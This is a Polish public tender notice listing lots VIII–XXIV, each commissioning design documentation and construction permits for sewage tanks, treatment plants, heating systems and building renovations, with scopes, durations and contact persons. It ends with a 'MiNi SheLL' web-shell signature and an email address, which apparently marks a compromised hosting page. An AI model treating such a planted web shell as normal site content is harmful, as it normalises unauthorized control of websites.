<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego  3 x 10m3 i instalacji kanalizacyjnej w miejscowości Konarskie nr 6 gmina Książ Wlkp., działka nr 95/2, zgodnie z Decyzją o warunkach zabudowy G.7331-20/09 z dnia 30.06.2009; stanowiącą załącznik nr 3G do SIWZ.                                                                                                       Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Roman Sroka tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego w miejscowości Włościejewki nr 10 gmina Książ Wlkp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego 1 x  10m3 w miejscowości Włościejewki nr 10 gmina Książ Wlkp., działka nr 120/7, zgodnie z Decyzją Ne 7331/85/85/2008 z dnia 30.10.2010; stanowiącą załącznik nr 3H do SIWZ.
Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Roman Sroka tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX: Opracowanie dokumentacji projektowo-kosztorysowej  oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane  na wykonanie trzech osiedlowych oczyszczalni ścieków oraz sieci kanalizacyjnych w miejscowościach: Ostrowo, Marzenin, Kawęczyn gmina Września..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na wykonanie trzech osiedlowych oczyszczalni ścieków oraz sieci kanalizacyjnych w miejscowościach: Ostrowo, Marzenin, Kawęczyn gmina Września.
Zakres opracowania koncepcji winien obejmować:
- bilans ilościowy i jakościowy ścieków surowych,
- koncepcję technologiczną oczyszczalni i systemu kanalizacyjnego,
- uzyskanie decyzji środowiskowej, decyzji lokalizacyjnej, raportu o stanie środowiska,
- propozycję planu zagospodarowania oczyszczalni,
- określenie miejsc zrzutu ścieków oczyszczonych i uzyskanie wstępnych opinii od właścicieli urządzeń melioracyjnych odnośnie przyjęcia ścieków oczyszczonych,
- propozycję połączeń kanalizacyjnych,
- określenie kosztów poszczególnych zadań inwestycyjnych,
- opracowanie  wniosku i uzyskanie decyzji o warunkach zabudowy i zagospodarowania działki dla oczyszczalni ścieków i systemu kanalizacyjnego,
- uzyskanie pozwoleń na budowę oczyszczalni ścieków , sieci kanalizacyjnej i przyłączy,
- wykonanie projektów wykonawczych dla budowy oczyszczalni, sieci kanalizacyjnej i przyłączy,
- wykonanie przedmiarów robót, kosztorysów inwestorskich i ślepych.
Zamówienie i koszt materiałów geodezyjnych pozostaje po stronie wykonawcy.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 200.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X: Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane dla wykonania pięciu instalacji c.o.  z kotłami gazowymi dwufunkcyjnymi budynku mieszkalnym z lokalem administracyjnym w Środzie Wlkp. ul. Daszyńskiego 11..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane dla wykonania pięciu instalacji c.o. z kotłami gazowymi dwufunkcyjnymi w budynku mieszkalnym z lokalem administracyjnym w Środzie Wlkp. ul. Daszyńskiego 11.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Roman Sroka tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część XI: Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na wykonanie podziemnych zbiorników bezodpływowych dla osiedla mieszkaniowego we Wszołowie gmina Gołuchów wraz z siecią i przyłączami do budynków..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej na wykonanie podziemnych zbiorników bezodpływowych dla osiedla mieszkaniowego we Wszołowie gmina Gołuchów wraz z sieciami i przyłączeniem wszystkich budynków oraz uregulowanie stanu prawnego działek 123/1, 123/2, 121 w Państwowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Pleszewie.
Wykonawca zobowiązany będzie do uzyskania wszelkich pozwoleń i warunków zabudowy  zgodnie z Prawem budowlanym.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Krzysztof Olejnik tel. 062/7379621..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Część XII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane w budynku oficyny w miejscowości Chwałkowie 2 gmina Strzałkowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo - kosztorysowej na remont zabytkowego budynku (mieszkalnego) oficyny w miejscowości Chwałkowice 2 gm. Strzałkowo, zapisanego w rejestrze zabytków pod nr 215/1392, uzyskanie odpowiednich uzgodnień i pozwoleń zgodnych z Prawem Budowlanym.
Dokumentacja musi być uzgodniona z Wojewódzkim Konserwatorem Zabytków. Dokumentację należy opracować po przeprowadzeniu wizji lokalnej z osobą uprawnioną do kontaktów.
Zakres robót obejmuje:
- remont dachu, wymiana uszkodzonych elementów więźby dachowej 
- wymiana pokrycia dachu z uwzględnieniem izolacji termicznej dachu
- remont kominów na poddaszu i nad dachem
- montaż opierzeń, rynien, rur spustowych i innych obróbek blacharskich 
- wykonanie instalacji odgromowej
- wymiana stolarki okiennej oraz drzwiowej
- uzupełnienie tynków wewnętrznych
- wykonanie elewacji zewnętrznej
Dokumentacja powinna być wykonana w 5 egzemplarzach.
Projekt powinien zawierać:
- kosztorysy inwestorskie
- kosztorysy ofertowe - przedmiar
- specyfikację wykonania robót i odbioru.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Władysław Lewandowski tel. 063/2424121..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Część XIII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Biela 14, gm. Wilczyn..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo - kosztorysowej na remont budynku mieszkalnego w miejscowości Biela 14 gm. Wilczyn oraz uzyskanie odpowiednich uzgodnień i pozwoleń zgodnych z Prawem Budowlanym.
Dokumentację należy opracować po przeprowadzeniu wizji lokalnej z osobą uprawnioną do kontaktów.
Zakres robót obejmuje:
- remont dachu, wymiana więźby dachowej
- wymiana pokrycia dachu z uwzględnieniem izolacji termicznej
- montaż rynien dachowych, rur spustowych i obróbek blacharskich
- remont kominów na poddaszu i nad dachem
- ocieplenie stropu nad parterem
- wykonanie instalacji odgromowej
Dokumentacja powinna być wykonana w 5 egzemplarzach.
Projekt powinien zawierać:
- kosztorys inwestorski
- kosztorys ofertowy - przedmiar
- specyfikację wykonania robót i odbioru
Osoba do kontaktu w sprawie przedmiotu zamówienia: Władysław Lewandowski tel. 063/2424121..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Część XIV: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Bogusławice 85c, gm. Babiak..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo - kosztorysowej na remont budynku mieszkalnego w miejscowości Bogusławice 85c, gm. Babiak oraz uzyskanie odpowiednich uzgodnień i pozwoleń zgodnych z Prawem Budowlanym.
Dokumentację należy opracować po przeprowadzeniu wizji lokalnej z osobą uprawnioną do kontaktów.
Zakres robót obejmuje:
- remont dachu, wymiana więźby dachowej
- wymiana pokrycia dachu z uwzględnieniem izolacji termicznej dachu
- remont kominów na poddaszu i nad dachem
- montaż opierzeń, rynien, rur spustowych i innych obróbek blacharskich
- wykonanie instalacji odgromowej
- ocieplenie stropu
- podwyższenie ścian poddasza (ściany kolankowej)
Dokumentacja powinna być wykonana w 5 egzemplarzach.
Projekt powinien zawierać:
- kosztorys inwestorski
- kosztorys ofertowy - przedmiar
- specyfikację wykonania robót i odbioru.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Władysław Lewandowski tel. 063/2424121..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Część XV: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Żeroniczki 4, gm. Przykona..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo - kosztorysowej na remont budynku mieszkalnego w miejscowości Żeroniczki 4 gm. Przykona oraz uzyskanie odpowiednich uzgodnień i pozwoleń z godnych z Prawem Budowlanym.
Dokumentację należy opracować po przeprowadzeniu wizji lokalnej z osobą uprawnioną do kontaktów.
Zakres robót obejmuje:
- remont dachu, wymiana uszkodzonych elementów więźby dachowej
- wymiana pokrycia dachu z uwzględnieniem izolacji termicznej dachu
- remont kominów na poddaszu i nad dachem
- montaż opierzeń, rynien, rur spustowych i innych obróbek blacharskich
- wykonanie instalacji odgromowej
- ocieplenie stropu
Dokumentacja powinna być wykonana w 5 egzemplarzach.
Projekt powinien zawierać:
- kosztorys inwestorski
- kosztorys ofertowy - przedmiar
- specyfikację wykonania robót i odbioru
Osoba do kontaktu w sprawie przedmiotu zamówienia: Władysław Lewandowski tel. 063/2424121..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Część XVI: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Sompolno, ul. Polna 43..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo - kosztorysowej na remont budynku mieszkalnego w miejscowości Sompolno, ul. Polna 43 oraz uzyskanie odpowiednich uzgodnień i pozwoleń zgodnych z Prawem Budowlanym.
Dokumentację należy opracować po przeprowadzeniu wizji lokalnej z osobą uprawnioną do kontaktów.
Zakres robót obejmuje:
- remont dachu, wymiana więźby dachowej
- wymiana pokrycia dachu z uwzględnieniem izolacji termicznej
- montaż rynien dachowych, rur spustowych i obróbek blacharskich
- remont kominów na poddaszu i nad dachem
- ocieplenie stropu nad parterem
- wykonanie podwyższenia ścian poddasza tzw. ściany kolankowej
- wykonanie instalacji odgromowej
Dokumentacja powinna być wykonana w 5 egzemplarzach.
Projekt powinien zawierać:
- kosztorys inwestorski
- kosztorys ofertowy - przedmiar
- specyfikację wykonania robót i odbioru.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Władysław Lewandowski tel. 063/2424121..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Część XVII: Opracowanie dokumentacji projektowo-kosztorysowej  oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na remont budynku mieszkalnego w miejscowości Szołdry nr 15..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na remont budynku mieszkalnego w miejscowości Szołdry nr 15.
Zakres opracowania dokumentacji dotyczy:
- remont pokrycia,
- remont konstrukcji drewnianej dachu,
- remont konstrukcji budynku, odwodnienie,
- orynnowanie i obróbki blacharskie,
- wymiana stolarki okiennej i drzwiowej  zew.,
- remont elewacji, termomodernizacja,
- inne niezbędne roboty wynikające z oceny stanu technicznego obiektu przez wykonawcę dokumentacji.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Część XVIII: opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy prawo budowlane na modernizację, adaptację budynku biurowo-mieszkalnego na lokale mieszkalne w miejscowości Sokołowo ul. Szlachecka nr 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na modernizację, adaptację budynku biurowo-mieszkalnego na lokale mieszkalne w miejscowości Sokołowo ul. Szlachecka nr 4.
Zakres opracowania dokumentacji dotyczy:
- adaptacji pomieszczeń na lokale mieszkalne,
- instalacja elektryczna,
- instalacja wod-kan,
- instalacja c.o. i c.w.u.
- wymiana stolarki okiennej i drzwiowej wew. i zew.
- termomodernizacja budynku.
Wykonawca zobowiązany będzie do przedstawienia koncepcji usytuowania lokali mieszkalnych (4 lokale i 5 lokali) oraz podziału kondygnacji piwnicznej na lokale użytkowe z wydzieleniem węzła cieplnego. Ostateczna koncepcja podziału winna być zatwierdzona przez inwestora.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Część XIX: Opracowanie dokumentacji projektowej na przyłącze energetyczne, wodociągowe i przebudowa wejścia do sąsiedniego  budynku mieszkalnego nr 10 oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane - budynku mieszkalnego (rządówka) w miejscowości Bugaj gmina Miłosław..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na przyłącze energetyczne, wodociągowe i przebudowa wejścia do sąsiedniego budynku mieszkalnego nr 10 oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane dla budynku mieszkalnego (rządówki) położonego w miejscowości Bugaj gmina Miłosław, zapisanego w rejestrze zabytków 963/A.
Zakres opracowania dokumentacji dotyczy:
- wykonania nowego przyłącza energetycznego,
- wykonania nowego przyłącza wodociągowego,
- przebudowa wejścia do budynku mieszkalnego nr 10,
- inne niezbędne roboty wynikające z oceny stanu technicznego obiektu przez wykonawcę dokumentacji.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Roman Sroka tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Część XX: Opracowanie dokumentacji projektowo-kosztorysowej  oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane dla dokończenia remontu kotłowni węglowej i komina ceramicznego w miejscowości Marzenin gmina Września..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane dla dokończenia remontu kotłowni węglowej i komina ceramicznego w miejscowości Marzenin gmina Września.
Zakres rzeczowy:
- ogrodzenia i place składowania i transportu opału i żużla z przenośnikiem taśmowym odżużlania oraz podjazdem dla dostawy opału,
- wyposażenie pomieszczeń socjalnych w urządzenia sanitarne i podejścia wod-kan,
- wyposażenie instalacji technologicznej w zawory upustowo regulacyjne z uwzględnieniem zainstalowanych pomp typu 65 Pot 120 A/B,
- chemiczne płukanie instalacji technologicznej po wymianie armatury,
- wykonanie posadzek zmywalnych w pomieszczeniach kotłowni,
- remont węzłów cieplnych z zainstalowaniem armatury odcinającej, liczników ciepła, zaworów regulacji dopływu ciepła z sieci cieplnych, wraz z izolacją cieplną,
- remont komina ceramicznego w zakresie częściowej rozbiórki i przemurowania emitora (część górna) oraz układu wyczystkowego.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Roman Sroka tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Część XXI: Sporządzenie ekspertyzy oraz dokumentacji projektowo-kosztorysowej na wykonanie remontu dachu, ścian i odwodnienia terenu wokół budynku kaplicy w miejscowości Uchorowo gmina Murowana Goślina..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie ekspertyzy oraz dokumentacji projektowo-kosztorysowej na wykonanie remontu dachu, wszelkich obróbek blacharsko-dekarskich, wymiany tynków wewnętrznych ścian, remont stolarki okiennej i drzwiowej, wykonanie  odwodnienia terenu wokół budynku kaplicy w miejscowości Uchorowo gmina Murowana Goślina wraz ze sporządzeniem specyfikacji technicznej wykonania i odbioru robót, uzyskania niezbędnych uzgodnień (w tym WWKZ) i pozwoleń na podstawie przepisów aktualnie obowiązujących w tym zakresie.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Marek Piasecki tel. 61/8177120..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Część XXII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na wykonanie rozbiórki miejscowości Orle Wielkie gmina Chrzypsko Wielkie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo-kosztorysowej, specyfikacji technicznej wykonania i odbioru robót budowlanych na rozbiórkę budynku stodoły nr inw. 180/OE/12/+1 położonego na działce o numerze ewidencyjnym gruntu 34/17 w miejscowości Orle Wielkie gmina Chrzypsko Wielkie. W dokumentacji należy uwzględnić ilość materiału porozbiórkowego oraz określenie wysypiska złożenia materiałów; gruzu ceglanego i papy bitumicznej. Należy uzyskać wszystkie ostateczne (prawomocne) decyzje administracyjne wymagane przepisami prawa.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Zygmunt Glapiak tel. 65/5185564..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Część XXIII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę oczyszczalni ścieków z uwzględnieniem rozbiórki  starej oczyszczalni ścieków w miejscowości Garzyn gmina Krzemieniewo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej na budowę oczyszczalni ścieków z uwzględnieniem rozbiórki starej oczyszczalni w miejscowości Garzyn gmina Krzemieniewo powiat leszczyński na działce nr 236/2, 238/4.  Zdolność technologiczna oczyszczalni na 1400 osób. Wymianę  istniejącej instalacji kanalizacyjnej doprowadzającej ścieki z budynków do oczyszczalni około 450 mb,  wraz z przyłączami do istniejących budynków.
Należy również uzyskać pozwolenie na budowę oraz opracować operat wodno-prawny na odprowadzenie ścieków.
Projektowana oczyszczalnia powinna charakteryzować się: wysokim stopniem oczyszczania ścieków tzn. gwarantować ich oczyszczenie do parametrów zgodnych wymaganiami obowiązujących przepisów, pracą w pełnej automatyce, niskimi kosztami eksploatacji, niskim zużyciem energii elektrycznej, dużą elastycznością w zakresie ilości dopływających ścieków, niezawodnością działania przez wiele lat.
Oczyszczalnia powinna składać się z dwóch ciągów technologicznych.
Zbiorniki oczyszczalni ścieków muszą być wykonane z trwałych, szczelnych i wytrzymałych , a także odpornych na korozję tworzyw sztucznych. Zbiornik musi być posadowiony w gruncie z wystającymi jedynie klapami rewizyjnymi. Całość zamknięta. 
Osoba do kontaktu w sprawie przedmiotu zamówienia: Jacek Siuda tel. 65/5185564..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 180.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Część XXIV: Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na remont pokrycia dachu, konstrukcji dachu oraz stropu budynku mieszkalnego w miejscowości Górzno gmina Ostrów Wlkp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo-kosztorysowej na remont pokrycia dachu, remont konstrukcji dachu, remont stropów, naprawa kominów, naprawa obróbek blacharskich, ocieplenie dachu dla budynku mieszkalnego Górzno 37 nr inw. ST/110/110/B/43, działka nr 249/4 gmina Ostrów Wlkp. Budynek znajduje się pod ochroną konserwatorską, w związku z czym należy uzyskać wymagane uzgodnienia z WKZ Oddział w Kaliszu przy ul. Tuwima 10 oraz uzyskanie wszelkich pozwoleń wymaganych ustawą Prawo budowlane.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Krzysztof Olejnik tel. 062/7379621..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com